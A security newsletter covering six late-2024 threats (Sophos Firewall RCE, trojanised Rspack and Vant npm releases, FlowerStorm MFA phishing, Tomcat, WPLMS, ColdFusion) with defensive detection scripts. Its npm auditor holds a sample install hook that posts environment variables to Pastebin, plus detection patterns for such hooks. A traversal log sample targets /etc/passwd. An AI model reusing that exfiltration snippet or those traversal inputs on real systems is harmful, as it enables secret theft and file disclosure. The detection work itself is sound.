Mycomputerspot Security Newsletter
Today’s Cybersecurity Threats and Trends - 12/26/2024
More npm troubles as RCEs pop up everywhere!
1. Sophos Discloses Critical Firewall RCE Vulnerability
Primary Threat: Sophos has published a security advisory for a critical remote code execution (RCE) flaw in Sophos Firewall. An attacker who can reach an affected service with a maliciously crafted request can execute arbitrary code on the appliance, and a compromised perimeter firewall is a foothold into every network segment behind it. All supported firmware releases prior to the fixed version are affected. Sophos urges customers to update every appliance without delay and to confirm the fix is present rather than assume it.
Risk: Unauthorized access, lateral movement, and full system compromise.
Detection Tips:
Monitor the firewall's own logs for malformed or unexpected requests to its administrative and user-facing web interfaces, especially from the WAN side, and keep those interfaces off the internet where the deployment allows it.
Baseline the outbound connections the firewall itself initiates and alert on anything outside update and licensing traffic; an appliance opening new outbound sessions on its own is a strong indicator of compromise.
Apply the latest patch promptly and verify the installed version on every appliance afterwards; if an appliance sat exposed and unpatched, review its admin accounts and configuration for unauthorised changes.
2. Malicious RSPack and Vant Packages Published Using Stolen NPM Tokens
Primary Threat: Malicious versions of the legitimate npm packages Rspack and Vant were published to the registry using stolen maintainer tokens, according to Sonatype research. The rogue versions carry code that runs on the installing machine and steals environment variables, credentials and sensitive project data, so any developer workstation or CI runner that installed them should be treated as compromised. Developers are urged to check their lockfiles for the affected versions, remove them immediately, and rotate any secrets those hosts held.
Risk: Credential theft, project compromise, and unauthorized access to sensitive environments.
Detection Tips:
Pin dependencies with a lockfile and compare installed versions against the malicious versions named in the advisory; be suspicious of a patch-level bump that suddenly adds a preinstall or postinstall hook.
Monitor build hosts and CI runners for unexpected outbound connections to paste and file-sharing services such as Pastebin, which have no business in a build.
Protect publishing credentials: use scoped, short-lived tokens, require two-factor authentication for publishing, rotate tokens regularly, and revoke them the moment a maintainer's machine is suspected compromised.
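The dependency check above can be automated. The script below is an added example written for this newsletter item, not code from Sonatype, Rspack or Vant: it walks a node_modules tree, lists every package that declares an install-time hook (the point at which a trojanised release gets to run on the installing machine), and tags hooks whose code reads process.env, spawns processes, talks to the network or hides behind base64/eval. The package tree it builds is constructed for the demonstration, and the names in it (good-addon, example-stealer) are hypothetical.

```python
"""Audit a node_modules tree for packages that run install-time scripts and
whose hook code reads secrets or talks to the network.

Added example for this newsletter item; not code from Sonatype, Rspack or
Vant. The package tree built by build_sample_tree() is constructed, and the
package names in it (good-addon, example-stealer) are hypothetical.
"""
import json
import re
import tempfile
from pathlib import Path

# Lifecycle hooks npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Behaviours worth a closer look when they appear in install-time code.
SUSPICIOUS = {
    "reads-env": re.compile(r"process\.env\b"),
    "spawns-process": re.compile(r"child_process|\bexec(?:Sync)?\s*\("),
    "network": re.compile(r"\bhttps?\.(?:request|get)\(|\bfetch\(|pastebin\.com"),
    "obfuscation": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|\beval\("),
}


def _hook_source(pkg_dir: Path, command: str) -> str:
    """Return the code a hook runs: the target file for `node <file>` when it
    lives inside the package, otherwise the command line itself."""
    m = re.match(r"^\s*node\s+(\S+)", command)
    if m:
        target = pkg_dir / m.group(1)
        if target.is_file():
            return target.read_text(encoding="utf-8", errors="replace")
    return command


def audit_node_modules(root: Path) -> list:
    """Report every package declaring an install hook, tagged with the
    suspicious behaviours found in its hook code (no tags = review only)."""
    findings = []
    for manifest in sorted(root.rglob("package.json")):
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue
        scripts = meta.get("scripts") or {}
        if not isinstance(scripts, dict):
            continue
        hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
        if not hooks:
            continue
        tags = set()
        for cmd in hooks.values():
            src = _hook_source(manifest.parent, str(cmd))
            tags.update(tag for tag, rx in SUSPICIOUS.items() if rx.search(src))
        findings.append({
            "package": meta.get("name", manifest.parent.name),
            "version": meta.get("version", "?"),
            "hooks": sorted(hooks),
            "tags": sorted(tags),
        })
    return findings


def build_sample_tree() -> Path:
    """Constructed node_modules: a benign native-addon style package and a
    hypothetical package whose postinstall hook posts process.env to Pastebin."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    benign = root / "good-addon"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps({
        "name": "good-addon", "version": "1.0.0",
        "scripts": {"install": "node-gyp rebuild"},
    }))
    bad = root / "example-stealer"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "example-stealer", "version": "9.9.9",
        "scripts": {"postinstall": "node setup.js"},
    }))
    (bad / "setup.js").write_text(
        "const https = require('https');\n"
        "const data = JSON.stringify(process.env);\n"
        "https.request({host: 'pastebin.com', method: 'POST'}).end(data);\n"
    )
    return root


if __name__ == "__main__":
    for f in audit_node_modules(build_sample_tree()):
        flag = "SUSPECT" if f["tags"] else "review"
        print(f"{flag:7} {f['package']}@{f['version']} hooks={f['hooks']} tags={f['tags']}")
```

Run it against a real project with `audit_node_modules(Path("node_modules"))`. Native addons legitimately use an install hook, so an empty tag list means "look, don't panic"; a hook that both reads the environment and opens a network connection is the combination that deserves immediate attention. Pair this with `npm install --ignore-scripts` on CI runners that do not need native builds, so a compromised release cannot run at all.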
3. FlowerStorm Phishing Service Fills Void Left by Rockstar2FA
Primary Threat: A new phishing-as-a-service (PaaS) platform, FlowerStorm, has emerged to fill the gap left by the recently disrupted Rockstar2FA service, according to Sophos X-Ops. FlowerStorm specialises in defeating multi-factor authentication: its pages sit between the victim and the real login service, capture the password and the one-time passcode as they are typed, and relay them so that the attacker, not the victim, ends the flow with an authenticated session. Selling this as a subscription puts adversary-in-the-middle phishing in the hands of attackers with no technical skill of their own.
Risk: Credential theft, account compromise, and unauthorized access to sensitive systems.
Detection Tips:
Monitor for failed MFA attempts followed by a successful sign-in from an unusual location, and for an MFA-verified session that is used from a second IP address within minutes; a relayed one-time code usually succeeds on the first try, so the second pattern catches what the first misses.
Flag emails that lead to login pages on lookalike domains; the fake page is often a live proxy of the real one, so it looks right and only the address bar gives it away.
Move to phishing-resistant MFA such as FIDO2/WebAuthn security keys or passkeys: the credential is bound to the genuine origin, so a proxied login page cannot obtain anything it can replay.
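The two sign-in patterns in the first tip can be expressed as a small correlation rule. The code below is an added example for this newsletter item, not code from Sophos X-Ops or any identity provider: it parses a constructed sign-in log and raises an alert when MFA failures are followed by a success from a different country, and when an MFA-verified login is followed within minutes by another success from a different IP and country (the relayed-session case). The five-field line format (timestamp user ip country event) is an assumption for the demonstration, not any real IdP's export schema.

```python
"""Detect sign-in sequences that look like an OTP-relaying phishing kit at
work: MFA failures followed by a success from somewhere else, and an
MFA-verified login that is immediately reused from a second location.

Added example for this newsletter item; not code from Sophos X-Ops or from
any identity provider. SAMPLE_LOG is constructed, and its five-field format
(timestamp user ip country event) is an assumption, not a real IdP schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # how close two events must be to correlate

# Constructed sign-in log. alice and bob are the cases to catch; carol is a
# user who mistyped a code and then signed in normally from the same place.
SAMPLE_LOG = """\
2024-12-26T08:01:10Z alice 203.0.113.5 US mfa_failed
2024-12-26T08:01:40Z alice 203.0.113.5 US mfa_failed
2024-12-26T08:03:05Z alice 198.51.100.7 NL success
2024-12-26T09:15:00Z bob 192.0.2.9 US success
2024-12-26T09:16:30Z bob 198.51.100.8 DE success
2024-12-26T10:00:00Z carol 192.0.2.20 US mfa_failed
2024-12-26T10:00:45Z carol 192.0.2.20 US success
"""


def parse_log(text: str) -> list:
    """Parse the constructed format into dicts, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, country, event = line.split()
        events.append({
            "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
            "user": user, "ip": ip, "country": country, "event": event,
        })
    return sorted(events, key=lambda e: e["ts"])


def detect(events: list) -> list:
    """Apply two rules per user over a sliding WINDOW:
    A. mfa_failed, then success from a different country (the page's tip).
    B. success, then another success from a different IP and country; a
       relayed code usually passes first time, so rule A alone misses it."""
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)
    alerts = []
    for user, evs in by_user.items():
        for i, cur in enumerate(evs):
            if cur["event"] != "success":
                continue
            recent = [p for p in evs[:i] if cur["ts"] - p["ts"] <= WINDOW]
            if any(p["event"] == "mfa_failed" and p["country"] != cur["country"]
                   for p in recent):
                alerts.append({"rule": "mfa_fail_then_new_location", "user": user,
                               "ip": cur["ip"], "ts": cur["ts"]})
            if any(p["event"] == "success" and p["ip"] != cur["ip"]
                   and p["country"] != cur["country"] for p in recent):
                alerts.append({"rule": "success_from_second_location", "user": user,
                               "ip": cur["ip"], "ts": cur["ts"]})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_log(SAMPLE_LOG)):
        print(f"{a['ts'].isoformat()} {a['rule']:29} user={a['user']} ip={a['ip']}")
```

In production the "unusual location" test should compare against each user's own history rather than against the preceding event, and rule B should be fed session identifiers so that a session minted on one IP and used on another is matched exactly instead of by proximity in time. The structure stays the same.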
Did you know...?
The phishing-as-a-service (PaaS) model has grown rapidly over the last decade, putting sophisticated phishing techniques in the hands of novice cybercriminals. Platforms like Rockstar2FA and FlowerStorm show how attackers use automation to get past MFA based on one-time codes and push approvals, which is why education and proactive monitoring remain critical, and why origin-bound factors such as FIDO2 security keys, which these kits cannot relay, are the durable fix.
4. Apache Fixes RCE Bypass in Tomcat Web Server
Primary Threat: Apache has released Tomcat updates to complete an earlier, incomplete fix for a remote code execution flaw, after it emerged that the original mitigation could be bypassed. According to the Apache security advisory, the issue is a time-of-check/time-of-use race during JSP compilation on case-insensitive filesystems such as Windows, and it is reachable only when the default servlet has been configured to allow writes (readonly set to the non-default value false); an attacker who can upload a file can then get it treated as a JSP and executed. Multiple Tomcat versions are affected, and on older Java releases the full fix also requires a JVM property change, so organisations using Tomcat are urged to update and review their configuration.
Risk: Arbitrary code execution, unauthorized server access, and potential data breaches.
Detection Tips:
Review conf/web.xml and every application's web.xml for a default servlet with readonly set to false, and monitor for PUT requests that create files with a JSP-like extension in unusual letter case.
Apply the latest Tomcat updates; if the default servlet must stay writable, set the sun.io.useCanonCaches system property to false on Java 8 and 11 (and make sure it is not set to true on Java 17) as the advisory instructs, and review access control configurations.
Isolate web servers to prevent lateral movement in case of compromise.
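The configuration review in the first two tips can be scripted. The check below is an added example for this newsletter item, not code from the Apache Tomcat project: it reads a web.xml, finds the default servlet's readonly init-param (Tomcat treats a missing parameter as read-only), inspects the JVM options for sun.io.useCanonCaches, and reports what still needs doing for a given Java major version. The web.xml excerpt and the option strings are constructed; the per-Java rules encoded in assess() follow the Tomcat security advisory for this fix.

```python
"""Check whether a Tomcat instance has the configuration the Apache advisory
ties to this RCE: the default servlet write-enabled (readonly=false) and, on
Java 8/11/17, the sun.io.useCanonCaches cache left on.

Added example for this newsletter item; not code from the Apache Tomcat
project. WEB_XML_TEMPLATE and the JVM option strings are constructed; the
per-Java rules in assess() follow the Tomcat advisory for this fix.
"""
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Constructed conf/web.xml excerpt; a real file declares many more servlets.
WEB_XML_TEMPLATE = """<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee" version="6.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>listings</param-name><param-value>false</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>{readonly}</param-value></init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>
"""


def _local(tag: str) -> str:
    """Strip the namespace so the check works for Tomcat 9 (javaee) and 10+ (jakartaee)."""
    return tag.rsplit("}", 1)[-1]


def default_servlet_readonly(web_xml: str) -> bool:
    """True if the default servlet rejects PUT/DELETE. Tomcat's built-in
    default is read-only, so a missing readonly init-param counts as true."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        name = next((c.text or "" for c in servlet if _local(c.tag) == "servlet-name"), "")
        if name.strip() != "default":
            continue
        for param in servlet:
            if _local(param.tag) != "init-param":
                continue
            kv = {_local(c.tag): (c.text or "").strip() for c in param}
            if kv.get("param-name") == "readonly":
                return kv.get("param-value", "true").lower() != "false"
    return True


def canon_cache_setting(jvm_opts: str) -> Optional[str]:
    """Return 'true' or 'false' if -Dsun.io.useCanonCaches is set, else None."""
    m = re.search(r"-Dsun\.io\.useCanonCaches=(true|false)\b", jvm_opts)
    return m.group(1) if m else None


def assess(web_xml: str, jvm_opts: str, java_major: int) -> dict:
    """Combine both checks using the advisory's per-Java guidance."""
    write_enabled = not default_servlet_readonly(web_xml)
    actions = []
    if write_enabled:
        actions.append("default servlet accepts PUT/DELETE: upgrade to a fixed "
                       "release and set readonly=true unless writes are required")
        cache = canon_cache_setting(jvm_opts)
        if java_major <= 11 and cache != "false":
            actions.append("Java 8/11: add -Dsun.io.useCanonCaches=false "
                           "(the cache is on by default)")
        elif 11 < java_major < 21 and cache == "true":
            actions.append("Java 17: remove -Dsun.io.useCanonCaches=true "
                           "(it must stay false)")
    return {"write_enabled": write_enabled, "actions": actions}


if __name__ == "__main__":
    risky = WEB_XML_TEMPLATE.format(readonly="false")
    for opts, java in (("-Xmx2g", 11), ("-Xmx2g -Dsun.io.useCanonCaches=false", 11), ("", 21)):
        print(java, opts or "(no opts)", assess(risky, opts, java))
```

Point `default_servlet_readonly` at every web.xml in the deployment, not just conf/web.xml, because an application can override the default servlet in its own descriptor. The honest first question the output should prompt is whether the server needs a writable default servlet at all; most do not, and readonly=true removes the precondition entirely.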
5. WPLMS WordPress Plugins Address Critical Vulnerabilities
Primary Threat: Seven critical vulnerabilities have been identified in the WPLMS and VibeBP WordPress plugins used by learning-management sites, affecting over 100,000 educational websites. Patchstack researchers report that the flaws allow SQL injection, privilege escalation and arbitrary file deletion. Administrators are urged to apply the available patches without delay.
Risk: Website defacement, unauthorized database access, full site takeover (arbitrary file deletion can remove wp-config.php and drop WordPress back into its installer), and operational disruption.
Detection Tips:
Monitor WordPress for new administrator accounts or role changes that did not originate from an administrator's session, and for database errors that suggest injection probes.
Until the patches are applied, block access to the plugins' public endpoints (their REST routes and admin-ajax actions) at the web server or WAF, or deactivate the plugins.
Regularly audit installed plugins for security updates and best practices, and remove plugins that are no longer maintained.
6. Adobe Warns of ColdFusion Bug with PoC Exploit
Primary Threat: Adobe has issued a security bulletin for a critical ColdFusion vulnerability for which proof-of-concept exploit code is already circulating online. The flaw is a path-traversal weakness that lets an attacker read arbitrary files from the server's filesystem; that is short of direct code execution, but configuration files, credentials and keys read this way are routinely the first step to full control of the server. Immediate patching is strongly recommended.
Risk: Arbitrary file read, credential and configuration exposure, and follow-on server compromise and data exfiltration.
Detection Tips:
Monitor for requests to ColdFusion endpoints whose path or parameters contain traversal sequences (../ and its URL-encoded and double-encoded forms), and for unexpected reads of files outside the web root.
Apply Adobe's update immediately and restrict access to the ColdFusion Administrator to trusted networks.
Audit network traffic and web server logs for exploitation attempts against ColdFusion servers, and if a server sat exposed unpatched, rotate any credentials stored in files it could have served.
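A naive grep for "../" misses most of what the first tip asks for, because traversal payloads arrive percent-encoded, double-encoded, or with backslashes. The detector below is an added example for this newsletter item, not code from Adobe or from the public PoC: it decodes each request path and query value until stable, unifies separators, and flags any value that climbs above its starting directory. The access-log lines are constructed, and /app/download.cfm is a hypothetical endpoint rather than the vulnerable ColdFusion component.

```python
"""Flag web requests carrying directory-traversal sequences in the path or a
query parameter, after undoing percent-encoding (including double encoding)
and backslash separators so the obvious evasions do not slip past.

Added example for this newsletter item; not code from Adobe or from the
public PoC. SAMPLE_LOG is constructed and /app/download.cfm is hypothetical.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in combined-log style. Lines 2, 3 and 5 are
# traversal attempts (encoded, double-encoded, backslash); line 4 is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Dec/2024:10:00:01 +0000] "GET /index.cfm HTTP/1.1" 200 512
203.0.113.5 - - [26/Dec/2024:10:00:02 +0000] "GET /app/download.cfm?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048
198.51.100.9 - - [26/Dec/2024:10:00:03 +0000] "GET /assets/%252e%252e/%252e%252e/windows/win.ini HTTP/1.1" 404 0
192.0.2.7 - - [26/Dec/2024:10:00:04 +0000] "GET /docs/a/../b.cfm HTTP/1.1" 200 100
192.0.2.8 - - [26/Dec/2024:10:00:05 +0000] "POST /app/download.cfm?file=reports\\..\\..\\config.xml HTTP/1.1" 200 77
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/')


def normalize(fragment: str) -> str:
    """Percent-decode until the string stops changing (max 3 rounds, which
    covers double and triple encoding) and treat backslash as a separator."""
    cur = fragment
    for _ in range(3):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur.replace("\\", "/")


def escapes_root(fragment: str) -> bool:
    """True if walking the normalised segments ever climbs above the start.
    '/docs/a/../b.cfm' stays inside and is not flagged."""
    depth = 0
    for seg in normalize(fragment).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def traversal_candidates(url: str) -> list:
    """Check the path and every query value; return (where, decoded) hits."""
    parts = urlsplit(url)
    cands = [("path", parts.path)]
    cands += [(f"query:{k}", v) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return [(where, normalize(v)) for where, v in cands if escapes_root(v)]


def scan_log(text: str) -> list:
    """Run the check over access-log lines and collect the offending requests."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        for where, decoded in traversal_candidates(url):
            hits.append({"ip": ip, "url": url, "where": where, "decoded": decoded})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ip']:14} {h['where']:11} {h['decoded']}")
```

Decoding before matching is the whole point: the second and third sample lines contain no literal "../" at all. The depth walk also avoids the false positives a plain substring match produces on legitimate relative references such as line 4.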
IN SUMMARY:
From the newly discovered FlowerStorm phishing platform to vulnerabilities in widely used technologies like Sophos Firewall, Apache Tomcat, and Adobe ColdFusion, today’s threats highlight the need for vigilance across diverse attack surfaces.
Malicious Rspack and Vant releases remind developers of the risks in supply chain dependencies, while the WPLMS and VibeBP flaws emphasize the importance of securing WordPress ecosystems.
Organizations must act promptly to patch vulnerabilities and educate users to detect advanced phishing tactics.
Stay vigilant, secure your systems, and keep your defenses updated to counter evolving threats.
J.W.
(P.S. Check out our partners! It goes a long way to support this newsletter!)